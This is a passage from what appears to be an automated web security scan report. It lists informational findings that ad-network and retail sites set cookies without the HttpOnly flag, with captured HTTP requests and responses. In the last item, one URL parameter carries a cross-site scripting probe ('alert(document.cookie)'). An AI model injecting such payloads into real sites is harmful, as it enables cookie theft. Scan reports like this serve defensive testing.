Location: http://ad.yieldmanager.com/pixel?id=708341&t=2
Content-Length: 0
Date: Mon, 16 May 2011 10:40:49 GMT

13.65. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsiPus_d8_3="MLsXsF8ubi5n4JAyM3neYUxL3byjGsaEu/PC8mfHrq2VN39C16clOd3lkQlF1r/4K9EuhyUUMr4GPKtDxyw2G0juyqPI8XbZZgxfiq6AafW/eRnGpuy0oiVFGmY3Anfh17v9nYyJlC5UWYdeqDDdjrbgLXmJ/pPo0wj0EEJCaVkNVr40iay7FTbmR5NbJCI+blpGLNeUxzogtMtHHUMNGwKx3F8aXmoPHRRqxtB/goK/IQ/uQoMDvsrutEqhZDMsyUVheav05qrblRXDPWy/rNJxLaVLM3GosHx+8zzqqJ3btw9S/QKOvEkPJO9OSD4Jsz7ZUKMr80s+7gxEkCY/pm6gU1moOoAGWrgwiuiNH0S9mp+WVqAw6ktrAucvsE6ybbgCJS2yX80idCxNbeHUzPswwQoj8F3xoVQQTNeKEEk1PD7lXR/946Xqqd2cisQ934ITg8brLQ=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="pUMdJE9DNwYYlW0E1idLvS/Qn1LhCaUFAhIyOv+V9d5XY9ZyPsA1wXIiKXHSeIHhw5Y9jFbCC8UE2QspKokupFpwJRvmC3SR9bjpy+u3zTB6wB9GtIz8ey7+WMS5mGiVeVP4eYtlG1LBl0ob101Vu7thOUknm321AigmkLMr4yjsHP8eBisFNrs1nvh2gNJgEKk9VRBMs7RFZlNr5ymNTP01l9tzQDoEJFCjH3S13zOvGsx0rLDJ86CDJ0mu4eG9IMrpSFNX8K1sO/zvYRrWNwogz6Zn68KkMi9882nuR7GooH9qwj4BstXy0Ofqiza9DRIycy7CiZ3m7NNAOZ6W3g6HPohG+1esZzkK/nwVzNWl10tgyc4p5GCPaFG3htjlIfrr4K4BPl1Lr3if8r4pRXhKzS6/xgq6+co31Z69AQ9BFwFuxuFYaskaIXIdp0KMaYqxLrrkVFadgUlpdt7atiGQvZcMMNzDLlzGMUzWSaLQ10Ycp1VHMgTjtYUOYUCu+S0GDsdFrdwfZWATEBCrghCFZRrNnL7tllYBAVppWFlFuK2hUHI6H8KHXaCPbfwT1ZZV+2SMYm5LGVXMO597msQA9q7CRqSaU0kLuSCqy+bJYKz0+NCw0npmJ+WGsgBqOas7wZSnm4lNDmUo3kw2G8q9nKxsXTWRG42E+RJmLUnBesF0e9UOnZUCfUhfFcF1JWDDCFvR8It6Stqkbwg7bW25MkGZZfr7Vurc7ydA1UVkLmTyH8RTofT7n5wOweexEsJCWh+OuXDJ3jhj0dd+BJLM7GeNzY0N8oaYbcMJJ3emWbbF5tp9Rerg2yQYt3Czfy/9/1eesgHvzkF/r4eQL083L5cHxSHN6oyEOvuiBMzEmtM+OhJCc4fFv4jjSWN2Phy1CNOotA1TJWfXOPuxt6/l99OuThD47SGXhSzBI46P5933lUtkXB99ENxHivs63dL/rf5u5kZA8LOhLtuUywXPpQu7If5LILMB8nfsJ7CR8iWTveR/9qzxgpYmB9ncLlXj93saYxct6Jodz/wWiJGUQVkTfOfOvwjDo9/0htEkF0MYVzwSx4M7cw=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=A55F91532C5B5ECBD7EA17754C90B7F6&rsi_site=321B4F74F24F8AB84A6B7335C286B21E&rsi_event=BE74CE476C51EE46644ACD25F8AFAFD4 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=1351916219573.468?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_G07608=82f4957c1a652091&G07608&0&4df33ff4&0&&4dcde361&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4df565ca&0&&4dcf65b3&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J06575=82f4957c1a652091&J06575&0&4df565d1&0&&4dcf5608&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv39S8JaSpnph4dB7K/U2jMrlZxPiFsbBfSBcrlROJywhuHqR1r/UA1T0iRssIdAE9WG5SkuBEsQUD3IuuN09ImomKQMeFq1jtxllLl2hNvJ93zI8nQT72tjMgtUdO//9wYgRqB8ZXuPro+o7BxsBR5pxD7EXVtXGydBkVQEudXG2D2wIkNBeqHmIWJj+bGrdjGRyWixast+xLN0K4Iw+ew6ThmTEKns4HxFbcBnFLmChGZ934MWdGZXXYRWuhxS3cwBXNGIONtB2mXemfgyEqzd2IBmI9G7wogGLDx8Lw0DAp53p7JuTlqcYDDCICXYM9H2ZnYlIi4JrCJzCy8WcgNq18GmmzuaTOz/CYt2C7l9cgcwecxI15dlo8KJWy8mdmvMATQlBQZvvshGx7/ZWO+n5+L+o3XoVAx3gT2aCZHqJjly/K2Xoj1Qw67qH0PuJYpMK5P/KiQ3zOVyfP/ypI3utDRIhc08fTvQR/OwZZuegUWhFE/sq9FQhAzxOxIUTEvSResbfdfBhvTYofAJyTSyywbmhBb1MDtD0AFkYRyczjrYj2sKaFHZRb4fmzvPKfH6Zk5gmTLJV0gMS1UqtVy/S2L8TpN/clrGMHfxjNSPD5FT/EJtkm0EFhEQ27Z/cReQRxmltlL0MzcDhcs4e/wDwceblUp0um7chLLj/9/l1yBXBuwEgHk1flpVPkRmS/XI+a+2dCRvFnQSugMULpDNrA24o1pFVOIWNzLGZT2Krf+nzgF5TV38bNdoImSe5zwcruCXUG2Ktx5bQZtk7hjyijC/wmaioSX0PWNvks1FPlRUSXt/go8LnugdkWwYNOashsf6bBdytaAhOmPeOITWXSATA4ZE5SyPxGC0Znb3KDFATW1t50eAoudsHBsRbGRnxbn5H9cjPONtxL7egOM2+ltX2Nj9k3QVOzWzXEbkqT5akyVl21my7/DhratEWYI71JWlJ+9P5DWoLAVAyHTfXhezKMST83PEAtbhYhRavvp7A==; rsi_segs_1000000=pUPNfkOBbgIUFmLCHes0KW6m3ZgQXnnQ2eTN9Oww/xC5n7e8t97wZrFpPHW1rmtgC9BicX3TKz2eCELNYrMRQ5Lqu2zxeyWWfvlSUcVQiomYts8ECBn+Htu45MvaZOVPjeiVX8Zn2dbYnd4CY/vI2hWo9+I5cVgso6DGe8kTro5udIZWJUPSA1+To+3klpCjRbw2Bad0n9tXCulP4zeaUmaiTlY9FzqRkpBXPIFsEjprZNo=; rtc_dUn8=MLsvsNFKMT5nJ5GuU8+Vm/S3bm5E5k5tMt3NnMGp0iPrRxZIAPXk1sWJJd0/criBZWlpdqwlBoSERTTrYCc/gUIlS1FVffKLHMTvhZ2/kRd2fDWGXo0973OxjVJvM4sWN23lbJTGpwkPvUZano6YF0AUV+JeNaoAt8+pSbKbdnsUNCEdADOFfSeqyYTDSDEIe2vG2nUWVvCrZ+mEz9AYFmDW2hNSjGBpITTC96K7z8YQwS3lvAdlwRZUXU+bm0B6nc2R3bprYgz8eD2Ov4Fe4x5XnK8Mne17nReJOAJZHIgz5IbuNCwt4XEkjz14AaSmzHNOpukOLKJpmILuaSsa9st9voigEMZmhjkK3mkyeJhApPsJEbab/3lzTO39mzt5Z54rippve02eRS7gFHqfCoB3HzprQxzA4Cf+P+TfZnKZ89g=; NETSEGS_D05509=82f4957c1a652091&D05509&0&4df56df0&0&&4dcf5b30&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_gdpk="MLsfsN8vLi5noABTslDGHgHql1PWxLtwUwyTr7SqEAeIG7Al09+u78XGTslEJh9hd6s4OwXRvHjhIt8FcDXoBi5XqlnhuXhK+k7hhaJI9zU0CAuIx0hsbmph+ZwgGeQeavIa1wELH/jDnMrkr5ZpsnIwCKEGtcM070rhnKCJbnPgv/JP980S3TweqoaKG8kJudfxHiM2PjYCc+D3Kv4ZPeg4bJTfdrbQ7bptZJ4LtegkTcumqkO4h33GXxQRehGwbDMII/X9E+oPGwCg/xwUJgSDVTQJgbfrr9VStGZJoYAHD5K//QGfoiqTdSk5kXeo+0t3uTulN8p2Syu4yooLi8xN0kkhhQFMaSloQAt+9Q+rZ1/e100i8gaSvv7Fip5trVtjKqBYmXFoYwBh69bL8neIF3GxHL2kSRBU3s9WTic7L/IPVuew0+vAT3v8lsmTxk7equVE"; rsi_us_1000000="pUMdJE+jMAYYlW2ENjvhvtygvObDParz4dd72Y2njSIQ3FDbp4sN6ChluM8oZa8HtprfxwWjGdG1mepx3QOE/G52cE5mWm5D8+OtUcn1RBt6wB8iu4O+ygCedfKIq9/pjGepLhBB7hglaqnjXXwOdio4ZAsM8ewpawXM1Ouitf23beL8MHfsoO+keT9BYchhEqm9bRBMfxM973XWooJnIjN8J5pWnwN1IeYCPQBU6Kcx3ubkKHZeLnuEoDbICb1fVZwiijORoR9besNRbKiC5uO0GiIoH3bGO1QdVZxOERc9d/LzZ/nmdlZXlv7si2lvdgcCQI6WUUzljxKZrFRnDXuEOE8Asdd1no+bVPqW9qzvPG3Wrtf2Ybd7eGUGDovksoYO+38RpX4ztBEhTSSdexPYkwohTdS0NaK+xB69BRlRKyHuBuxIKsmabHJgkXwd9Z2grL3kdEadgUlodh7aEDuYID/6pIxK2fjGISxWSaLQ30ZAt1VAMwTjtcSOYkGu+T0G7Q9hAKyh18R9a7kSQoFt3+9406BJ0FDSG0olaPkhovf+CndgqByq4SVTZPuB/xh7yEugipIGGVwBY/U2DrlIvCKUuwL+//RwzF5htKCQhc/+lP+650tNiXCvqdUIPUtR+BNTxWslVPmzSM+ao3o3H7NjkrWKw4v8lyBbyzVBnccK6yuUPUnnPVIizAqgDS3VZ374z1uNgv2hgmHsV/eGhsi52AXVgVXWpyT8O+1HsgsqYFrmkaSmceEUxZyCN5bQUO9S3Rfc3/cuV8ZSKHzl1ItUlhObKaz0OGKnaJyQOU0rwl6K3hsfNHhFeaC0H9nXjmzh1iY4E3vDLrzwyuKlOQeBXxTNGx0gUfqSvD88i+BX9W6F/8VbBcBt6jvOGLwTBBom9JR2ZjdH+Z51SlYxp/+aJdnZJXk7MdAiuDlkxVF3iSYBYcUlVUFSLYngCDYVhGttXtm++iCdSF2R39SaIsk1YajDZ4Kjv53uHIRVCJ74ir6qNAdf9wTB8BeDDWS1VJcnrP98YZb4p0RPSkeVVUMEN3hdiYUTBqELXGUpTiXXRbbqXdw="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_gdpk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_gdpk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_d8_3="MLsXsF8ubi5n4JAyM3neYUxL3byjGsaEu/PC8mfHrq2VN39C16clOd3lkQlF1r/4K9EuhyUUMr4GPKtDxyw2G0juyqPI8XbZZgxfiq6AafW/eRnGpuy0oiVFGmY3Anfh17v9nYyJlC5UWYdeqDDdjrbgLXmJ/pPo0wj0EEJCaVkNVr40iay7FTbmR5NbJCI+blpGLNeUxzogtMtHHUMNGwKx3F8aXmoPHRRqxtB/goK/IQ/uQoMDvsrutEqhZDMsyUVheav05qrblRXDPWy/rNJxLaVLM3GosHx+8zzqqJ3btw9S/QKOvEkPJO9OSD4Jsz7ZUKMr80s+7gxEkCY/pm6gU1moOoAGWrgwiuiNH0S9mp+WVqAw6ktrAucvsE6ybbgCJS2yX80idCxNbeHUzPswwQoj8F3xoVQQTNeKEEk1PD7lXR/946Xqqd2cisQ934ITg8brLQ=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJE9DNwYYlW0E1idLvS/Qn1LhCaUFAhIyOv+V9d5XY9ZyPsA1wXIiKXHSeIHhw5Y9jFbCC8UE2QspKokupFpwJRvmC3SR9bjpy+u3zTB6wB9GtIz8ey7+WMS5mGiVeVP4eYtlG1LBl0ob101Vu7thOUknm321AigmkLMr4yjsHP8eBisFNrs1nvh2gNJgEKk9VRBMs7RFZlNr5ymNTP01l9tzQDoEJFCjH3S13zOvGsx0rLDJ86CDJ0mu4eG9IMrpSFNX8K1sO/zvYRrWNwogz6Zn68KkMi9882nuR7GooH9qwj4BstXy0Ofqiza9DRIycy7CiZ3m7NNAOZ6W3g6HPohG+1esZzkK/nwVzNWl10tgyc4p5GCPaFG3htjlIfrr4K4BPl1Lr3if8r4pRXhKzS6/xgq6+co31Z69AQ9BFwFuxuFYaskaIXIdp0KMaYqxLrrkVFadgUlpdt7atiGQvZcMMNzDLlzGMUzWSaLQ10Ycp1VHMgTjtYUOYUCu+S0GDsdFrdwfZWATEBCrghCFZRrNnL7tllYBAVppWFlFuK2hUHI6H8KHXaCPbfwT1ZZV+2SMYm5LGVXMO597msQA9q7CRqSaU0kLuSCqy+bJYKz0+NCw0npmJ+WGsgBqOas7wZSnm4lNDmUo3kw2G8q9nKxsXTWRG42E+RJmLUnBesF0e9UOnZUCfUhfFcF1JWDDCFvR8It6Stqkbwg7bW25MkGZZfr7Vurc7ydA1UVkLmTyH8RTofT7n5wOweexEsJCWh+OuXDJ3jhj0dd+BJLM7GeNzY0N8oaYbcMJJ3emWbbF5tp9Rerg2yQYt3Czfy/9/1eesgHvzkF/r4eQL083L5cHxSHN6oyEOvuiBMzEmtM+OhJCc4fFv4jjSWN2Phy1CNOotA1TJWfXOPuxt6/l99OuThD47SGXhSzBI46P5933lUtkXB99ENxHivs63dL/rf5u5kZA8LOhLtuUywXPpQu7If5LILMB8nfsJ7CR8iWTveR/9qzxgpYmB9ncLlXj93saYxct6Jodz/wWiJGUQVkTfOfOvwjDo9/0htEkF0MYVzwSx4M7cw=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=708341&t=2
Content-Length: 0
Date: Mon, 16 May 2011 10:41:55 GMT

13.66. http://ads.undertone.com/f previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.undertone.com
Path:	/f

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

UTID=4fa40dc9ea734290be23eabae06b7886; expires=Tue, 15-May-2012 02:00:16 GMT; path=/
UTPROFILES=15110%232978%3A1%2C2; expires=Sun, 14-Aug-2011 02:00:16 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /f?pid=2978&cb=[timestamp] HTTP/1.1
Host: ads.undertone.com
Proxy-Connection: keep-alive
Referer: http://img-cdn.mediaplex.com/0/17038/universal.html?page_name=ps_homepage&PS_Retargeting=1&mpuid=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UTID=4fa40dc9ea734290be23eabae06b7886; UTPROFILES=15110%232978%3A1

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSDo OUR BUS UNI COM NAV"
Content-Length: 43
Content-Type: image/gif
Date: Mon, 16 May 2011 02:00:16 GMT
Connection: close
Set-Cookie: UTID=4fa40dc9ea734290be23eabae06b7886; expires=Tue, 15-May-2012 02:00:16 GMT; path=/
Set-Cookie: UTPROFILES=15110%232978%3A1%2C2; expires=Sun, 14-Aug-2011 02:00:16 GMT; path=/

GIF89a.............!.......,...........D..;

13.67. http://adserver.veruta.com/track.fcgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adserver.veruta.com
Path:	/track.fcgi

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ueid=1461734246|1305465412|8|2; expires=Tue, 15-May-2012 01:54:22 GMT; path=/; domain=.veruta.com;
cmid=20772879917; expires=Tue, 15-May-2012 01:54:22 GMT; path=/; domain=.veruta.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.68. http://b.scorecardresearch.com/p previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/p

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=64dfc632-184.84.247.65-1305305561; expires=Wed, 15-May-2013 01:55:23 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.69. http://bluefly.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bluefly.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

SSID=AwDT8CkAAAAAZ4XQTYA_BAFnhdBNAQBnhdBNAAAAAAAAAABnhdBNAQA6AAAAWwQAAAI; path=/; domain=.bluefly.com; expires=Tue, 15-May-2012 02:01:11 GMT
SSSC=1.G5607128213521448832.1.58.1115; path=/; domain=.bluefly.com
SSRT=Z4XQTQA; path=/; domain=.bluefly.com; expires=Tue, 15-May-2012 02:01:11 GMT
SSOD=AGHw_gAA; path=/; domain=.bluefly.com; expires=Tue, 15-May-2012 02:01:11 GMT
TLTHID=5F2780327F60107F2440D794D8E577B2; Path=/
TLTSID=5F2780327F60107F2440D794D8E577B2; Path=/
TS18d374=7eefd9573d4868f4ad4e68b90b7bd65479d0598447a021b64dd08567; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: bluefly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 16 May 2011 02:01:11 GMT
Set-Cookie: SSLB=1; path=/; domain=.bluefly.com
Set-Cookie: SSID=AwDT8CkAAAAAZ4XQTYA_BAFnhdBNAQBnhdBNAAAAAAAAAABnhdBNAQA6AAAAWwQAAAI; path=/; domain=.bluefly.com; expires=Tue, 15-May-2012 02:01:11 GMT
Set-Cookie: SSSC=1.G5607128213521448832.1.58.1115; path=/; domain=.bluefly.com
Set-Cookie: SSRT=Z4XQTQA; path=/; domain=.bluefly.com; expires=Tue, 15-May-2012 02:01:11 GMT
Set-Cookie: SSOD=AGHw_gAA; path=/; domain=.bluefly.com; expires=Tue, 15-May-2012 02:01:11 GMT
Location: http://www.bluefly.com/
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Expires: Fri, 01 Oct 2010 19:42:13 GMT
Pragma: no-cache
Set-Cookie: TLTHID=5F2780327F60107F2440D794D8E577B2; Path=/
Set-Cookie: TLTSID=5F2780327F60107F2440D794D8E577B2; Path=/
RTSS: 1
Set-Cookie: TS18d374=7eefd9573d4868f4ad4e68b90b7bd65479d0598447a021b64dd08567; Path=/
Content-Length: 231

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.bluefly.com/
...[SNIP]...

13.70. http://cdn.media.bluefly.com/media/templates/images/topnav/bluefly_blue_navi_logo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.media.bluefly.com
Path:	/media/templates/images/topnav/bluefly_blue_navi_logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=A935623E7FA6107F30EEA0CB0E3247A1; Path=/; Domain=.bluefly.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.71. http://cdn.www.bluefly.com/media/css/custom-theme/bluefly_jqui.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.www.bluefly.com
Path:	/media/css/custom-theme/bluefly_jqui.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=A7EF03BC7FA6107F316B91C463EC5928; Path=/; Domain=.bluefly.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.72. http://cdn.www.bluefly.com/media/css/mybluefly.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.www.bluefly.com
Path:	/media/css/mybluefly.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=A7FAD6BA7FA6107F3120DAB2BEB63E44; Path=/; Domain=.bluefly.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.73. http://cdn.www.bluefly.com/media/templates/images/myaccount/login-submit.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.www.bluefly.com
Path:	/media/templates/images/myaccount/login-submit.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=AEF6BF247FA6107F3291AC8BAB1516C6; Path=/; Domain=.bluefly.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.74. http://cdn.www.bluefly.com/media/templates/images/myaccount/subh-create-account.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.www.bluefly.com
Path:	/media/templates/images/myaccount/subh-create-account.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=AEF637347FA6107F30AC9DF5B1018F77; Path=/; Domain=.bluefly.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.75. http://cdn.www.bluefly.com/media/templates/images/myaccount/subh-returning-customers.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.www.bluefly.com
Path:	/media/templates/images/myaccount/subh-returning-customers.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=AEEAE4E27FA6107F31AAFDF870B371A3; Path=/; Domain=.bluefly.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.76. http://cdn.www.bluefly.com/media/templates/images/myaccount/submit-submit.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.www.bluefly.com
Path:	/media/templates/images/myaccount/submit-submit.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTHID=A918C73C7FA6107F31F3FF7AB403FF9F; Path=/; Domain=.bluefly.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.77. http://cebwa.122.2o7.net/b/ss/cebwa001,cebwaglobalchartis/1/H.20.3/s35820650003258 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cebwa.122.2o7.net
Path:	/b/ss/cebwa001,cebwaglobalchartis/1/H.20.3/s35820650003258

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi=[CS]v1|26E8832D051D05E2-6000010660010273[CE]; Expires=Sat, 14 May 2016 11:11:22 GMT; Domain=cebwa.122.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/cebwa001,cebwaglobalchartis/1/H.20.3/s35820650003258?AQB=1&ndh=1&t=16/4/2011%206%3A11%3A20%201%20300&ce=iso-8859-1&ns=cebwa&cdp=2&pageName=undefined%3A/TGI2/proc/stateselector.aspx&g=http%3A//buy.travelguard.com/TGI2/proc/stateselector.aspx%3Fpcode%3DMYTG%26br%3Dtgdirect9c35a%2527%253balert%28document.cookie%29//bd29db8f83c%26intcmp%3Dclc-001-DualCTACruise-Feb19-ComMTG-SBSRight%26arc%3D000329&r=http%3A//burp/show/20&cc=USD&ch=undefined%3A&h1=D%3Dc8&c2=undefined%3A/TGI2/proc/&c3=undefined%3A/TGI2/proc/&c4=CEBWA%3A1.3&c8=insurance%20services%3Aamericas%3Aunited%20states%3Acommercial%20insurance%3Aaig%20travel%20guard-us&v17=clc-001-DualCTACruise-Feb19-ComMTG-SBSRight&v18=D%3DpageName&c19=anon&v19=anon&c20=anon%3Aundefined%3A/TGI2/proc/stateselector.aspx&c21=000329&v21=000329&c22=6%3A00AM&v22=D%3Dc22&c23=Monday&v23=D%3Dc23&c29=001&v29=001&c30=north%20america&v30=D%3Dc30&c32=tgdirect9c35a%27%3Balert%28document.cookie%29//bd29db8f83c&v32=D%3Dc32&c33=english&v33=D%3Dc33&c41=Live&s=1920x1200&c=24&j=1.7&v=Y&k=Y&bw=1137&bh=805&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1 HTTP/1.1
Host: cebwa.122.2o7.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://buy.travelguard.com/TGI2/proc/stateselector.aspx?pcode=MYTG&br=tgdirect9c35a%27%3balert(document.cookie)//bd29db8f83c&intcmp=clc-001-DualCTACruise-Feb19-ComMTG-SBSRight&arc=000329
Cookie: s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26E4A3B485010447-40000104C02528FD|4DCBEC0F[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmqljpxxjmx7Euvx7Bxxu=[CS]v4|26E4A3B485010447-40000104C02528FF|4DCBEC0F[CE]; s_vi_kxxwwupgxxbrbssx7Dx7Evb=[CS]v4|26E4A3B485010447-40000104C0252901|4DCBEC0F[CE]; s_vi_wdkkilx7Bdx7Ejhhf=[CS]v4|26E4A3B485010447-40000104C0252903|4DCBEC0F[CE]

Response

HTTP/1.1 302 Found
Date: Mon, 16 May 2011 11:11:22 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E8832D051D05E2-6000010660010273[CE]; Expires=Sat, 14 May 2016 11:11:22 GMT; Domain=cebwa.122.2o7.net; Path=/
Location: http://cebwa.122.2o7.net/b/ss/cebwa001,cebwaglobalchartis/1/H.20.3/s35820650003258?AQB=1&pccr=true&vidn=26E8832D051D05E2-6000010660010273&&ndh=1&t=16/4/2011%206%3A11%3A20%201%20300&ce=iso-8859-1&ns=cebwa&cdp=2&pageName=undefined%3A/TGI2/proc/stateselector.aspx&g=http%3A//buy.travelguard.com/TGI2/proc/stateselector.aspx%3Fpcode%3DMYTG%26br%3Dtgdirect9c35a%2527%253balert%28document.cookie%29//bd29db8f83c%26intcmp%3Dclc-001-DualCTACruise-Feb19-ComMTG-SBSRight%26arc%3D000329&r=http%3A//burp/show/20&cc=USD&ch=undefined%3A&h1=D%3Dc8&c2=undefined%3A/TGI2/proc/&c3=undefined%3A/TGI2/proc/&c4=CEBWA%3A1.3&c8=insurance%20services%3Aamericas%3Aunited%20states%3Acommercial%20insurance%3Aaig%20travel%20guard-us&v17=clc-001-DualCTACruise-Feb19-ComMTG-SBSRight&v18=D%3DpageName&c19=anon&v19=anon&c20=anon%3Aundefined%3A/TGI2/proc/stateselector.aspx&c21=000329&v21=000329&c22=6%3A00AM&v22=D%3Dc22&c23=Monday&v23=D%3Dc23&c29=001&v29=001&c30=north%20america&v30=D%3Dc30&c32=tgdirect9c35a%27%3Balert%28document.cookie%29//bd29db8f83c&v32=D%3Dc32&c33=english&v33=D%3Dc33&c41=Live&s=1920x1200&c=24&j=1.7&v=Y&k=Y&bw=1137&bh=805&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1
X-C: ms-4.4.1
Expires: Sun, 15 May 2011 11:11:22 GMT
